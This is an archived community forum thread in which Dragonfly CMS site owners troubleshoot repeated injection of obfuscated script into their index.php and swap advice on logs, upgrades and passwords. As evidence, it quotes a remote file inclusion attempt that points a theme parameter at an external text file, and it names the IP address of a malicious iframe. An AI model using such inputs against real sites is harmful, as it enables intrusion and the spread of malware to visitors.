Dragonfly CMS v9 ⇒ Security v9 :: Archives ⇒ Hacked twice in 2 days [Gallery 1.5] :: Archived ⇒ Community Forums ⇒ CPG Dragonfly™ CMS
Forum IndexSecurity v9

Archived ⇒ Hacked twice in 2 days [Gallery 1.5]


Someone is modifying my index.php and tacking an encoded script at the bottom:
<{script removed}
Anyone know how to deduce anything from this? I've used some of the built in features to try and harden things up. I'm hoping its a stupid CPanel or WHM vulnerability on our dedicated server. Ironically we never use these things I do everything from command line or phpMyAdmin. This is on lunarpages which is about $130 a month for not that great of a machine. Sad

Cheers,

Ronin
Ronin Technologies
Dragonfly Google Maps Module

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu 14.04 / 2.4.7 / 5.5.37 / 5.5.9 / 9.4.0.0


the script will load an iframe with src of
58.65.235.153/~pozitivu/ice/index.php?

you might try upgrading all your server software as well as DragonflyCMS with all DragonflyCMS and 3rd party modules and blocks installed.

I'll really think is an internal hacking attempt then a exploit on any php code, please check your ftp, ssh and apache logs.

http://dns-tools.domaintools.com/?q=58.65.235.153&m=dns wrote

DNS Lookup For 58.65.235.153

;; Answer received from 216.145.1.3 (105 bytes)
;;
;; HEADER SECTION
;; id = 8170
;; qr = 1 opcode = QUERY aa = 0 tc = 0 rd = 1
;; ra = 1 ad = 0 cd = 0 rcode = NXDOMAIN
;; qdcount = 1 ancount = 0 nscount = 1 arcount = 0

;; QUESTION SECTION (1 record)
;; 153.235.65.58.in-addr.arpa. IN PTR

;; ANSWER SECTION (0 records)

;; AUTHORITY SECTION (1 record)
235.65.58.in-addr.arpa. 10714 IN SOA ns1.hostfresh.com. us1core.hostfresh.com. (
2006101301 ; Serial
7200 ; Refresh
7200 ; Retry
1209600 ; Expire
86400 ) ; Minimum TTL

;; ADDITIONAL SECTION (0 records)

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


Sorry, my footer was out of date. I'm actually running 9.1.2.5 CVS on it. We'll definitely be upgrading other stuff ASAP.

Cheers,

Ronin
Ronin Technologies
Dragonfly Google Maps Module

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu 14.04 / 2.4.7 / 5.5.37 / 5.5.9 / 9.4.0.0


Don't forget to check your logs as well, logs might tell you what happened.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


Unfortunately this is a javascript issue. The script is obsfucated and likely generated on the fly.

A complete review of how this code was XSS'd to your index.php is required to understand "IF" an exploit was used. Your browser could be adding this...

At this point I'd state that anyone with MSF or w3af could do this.

J.
j e r u v y a t y a h o o d o t c o m

Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}


Just suffered the same hack myself... again ;( This seems to happen to me every other month now. It has happened on previous versions of CPG and now even with the latest version. This has only happened to CPG.

I tried to look up any evidence in my logs... but unfortunately... they hit the site only an hour before it rotated and the info I needed was deleted.

I have logged into my cpanel and checked the options to archive these logs now and hoping maybe I can capture what they are doing (even tho I will prolly not understand it).

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


scoopy, are you concerned about this?

Sorry to be so bold and brazen in my question but I really don't understand your post. You say this has happened to you but you do nothing about it.

If I was getting hacked every other month I'd be looking into it seriously. I would not allow my logs to be deleted. You should review how to deal with hackers/attackers before questioning getting hacked.

Many folks have liked this article and it may help you:

www.dragonflycms.org/F...=2864.html

In your case I don't know what to suggest other than wiping the site and starting from scratch. Ensure you know the extra's your adding in or installing are secure.

Audit your web host also, make sure they are not the ones getting hacked and they are simply modifying your existing pages so as to spread more malware.

Recent studies in malware shows MANY 'so called trusted' sites such as the recent Bank of India incident, are harboring malware. Using obsfucated javascript 'ensures' that the code is not detected easily by any anti-virus or anti-malware.

Performing frequent code audits can help detect and clean these types of issues from persisting. (Simply download your site then compare it against a fresh copy of the code or your backup)

So what would you like to do?

J.
j e r u v y a t y a h o o d o t c o m

Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}


Sorry, every other month was an exaggeration (for this site alone).

I looked up the record created by the server's "error_log" file. (this is created because the script being added produces a parse/syntax error) The last time this "hack" occurred was about 5 months ago. Also, the logs have not been deleted. I had the option to save them deselected in cPanel... thus they were not being saved and were rotated on a daily basis.

I upgraded to version 9.1.2.1 after that and that was the last of this hack... or so I thought, until yesterday. Since then... it has happened 3 more times today.

Each time the same error shows up on the site:
Parse error: syntax error, unexpected '<' in /home/smyp/public_html/index.php on line 133
which provides me with the approximate time of the event.

I scoured the logs (raw, awstats, and webalizer) and the latest visitors log... but can not find any signs of any hacking attempts to account for this code being added to the index page. For example... the popular:
themes/coppercop/theme.php?THEME_DIR=http://www.tripod.com/bypassid.txt?
which has since been secured up... now only produces nothing except a 404 error.

I also have noted a lot of the following showing up:
http://showmeyourpix.com/coppermine/addfav/db_input.php
which also produces a 404 error.

Everything else seems to be either genuine visitors or SE traffic.

And I really doubt this has anything to do with the host. Their security is pretty tight... running things like phpsuexec and having user nobody disabled, etc. Plus, I would think their would be more than 1 case like this with them if their was a security problem on their end.

I am not sure where to go at this point to figure out how this is being done... so I can close this hole for good.

thanks,

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


scoopy wrote
Sorry, every other month was an exaggeration (for this site alone).


Lets try to avoid exaggerations...it will haunt you.

I looked up the record created by the server's "error_log" file. (this is created because the script being added produces a parse/syntax error) The last time this "hack"


Can you define the 'hack'? I haven't seen anything except what you've posted below, and I'll come to that in a minute.

occurred was about 5 months ago.


Wow! So really we don't know anything relevent about the event since it's so old. Let's stick to current events then.

Also, the logs have not been deleted. I had the option to save them deselected in cPanel... thus they were not being saved and were rotated on a daily basis.


So you still have all the logs and everything since always?

I upgraded to version 9.1.2.1 after that and that was the last of this hack... or so I thought, until yesterday. Since then... it has happened 3 more times today.


Lets see the attacks...c'mon. We've seen them all... Smile

Each time the same error shows up on the site:
Parse error: syntax error, unexpected '<' in /home/smyp/public_html/index.php on line 133
which provides me with the approximate time of the event.


Ok, but this is not legit. You should not get a parse error on this page. Can you provide details of this and ensure it has not been modified? it would seem to me it has been. According to my copy of this file which for the record is:

$Source: /cvs/html/index.php,v $

$Revision: 9.31 $
$Author: nanocaiordo $
$Date: 2006/11/11 03:12:21 $

And my line 133 is the last line in the file and contains nothing.


I scoured the logs (raw, awstats, and webalizer) and the latest visitors log... but can not find any signs of any hacking attempts to account for this code being added to the index page.


Again, this is illegit. You have a typo in your script. If you'd be so kind as to post the entire index.php file of yours here.

For example... the popular:
themes/coppercop/theme.php?THEME_DIR=http://www.tripod.com/bypassid.txt?
which has since been secured up... now only produces nothing except a 404 error.


As it should.

I also have noted a lot of the following showing up:
http://showmeyourpix.com/coppermine/addfav/db_input.php
which also produces a 404 error.


This I'm not following. Where do you see this? Can you provide the exact entry you're seeing?

Everything else seems to be either genuine visitors or SE traffic.

And I really doubt this has anything to do with the host. Their security is pretty tight... running things like phpsuexec and having user nobody disabled, etc. Plus, I would think their would be more than 1 case like this with them if their was a security problem on their end.


Sorry this means nothing to me. Nobody is 100% secure. But I'd tend to agree with you unless they user cpanel or plesk. But I will not go into details on these products.

I am not sure where to go at this point to figure out how this is being done... so I can close this hole for good.


Some simple things for starters. Do not allow uploading anywhere. Disable HTML email. Remove any themes that have not been given a good reference. Remove any code that pulls data from other sites that has not been cleaned properly.

As for more specifics unfortunately we need details. You have not disclosed anything known or unknown that could be considered an issue, let alone a 'hole'. Perhaps someone else may see something I've missed but we need to get the specifics from you that seem to be causing the problem.

A decent incident report would be a good start.

thanks

J.
j e r u v y a t y a h o o d o t c o m

Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}


I thought the OP had defined the results of this "hack" pretty clearly. I have been trying to figure out how someone is able to add code to my index file and thus fix the problem... as I am sure that was the same intention of the OP.

Yes... I still have the "error_log" and No... to any previous HTTP logs. Someone has again somehow modified my index file today and I found the same <script> added to the bottom of the index.

Line 133 was where this HTML code was added by the "script kiddy" which is what breaks the PHP code and produces the error message... instead of the IFRAME or redirection they had intended. The error is then logged and that is what gives me an approx. time of the "hack".

Anyway... I think I may have guessed what me and the OP had in common that could be the reason we both had this same problem and will upgrade that module we both are running on our sites.

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


Guess it was not that module I updated yesterday... they did it again tonight.

So with everything updated and nothing showing in the logs --- where do I go from here ?

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


I bet that you and your admins are still using the same password.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


NanoCaiordo wrote
I bet that you and your admins are still using the same password.

If so... wouldn't that leave something in the visitors log that would look like this:
127.0.0.1 - - [04/Oct/2007:01:21:29 +0000] "GET /admin.php HTTP/1.1" 403 3780 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
There was nothing like that in today's log.

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something


They usually get the password of the 1st created admin, and as far i know lot of people use the same password for ftp, pop etc etc.

What I'll suggest you to do is to change all your passwords (df, ftp, ....) again.

See how it goes.

.:: I met php the 03 December 2003 :: Unforgettable day! ::.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
CloudLinux / Apache 2.4 LSAPI / MySQLi 5.6 / PHP 5.6 / DCVS


OK... have changed all cPanel and DF admin passwords (BTW: just me)... and even the mySQL username and password. I used 3 different passwords too.

Will keep ya' all posted.

Wanna Play A Game ? | Jazz it up @ the JazzArcade | A Splash of FUN @ the Arcade Splash

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
nix/1.3.37/5.0.27/5.2.1/9something

All times are UTC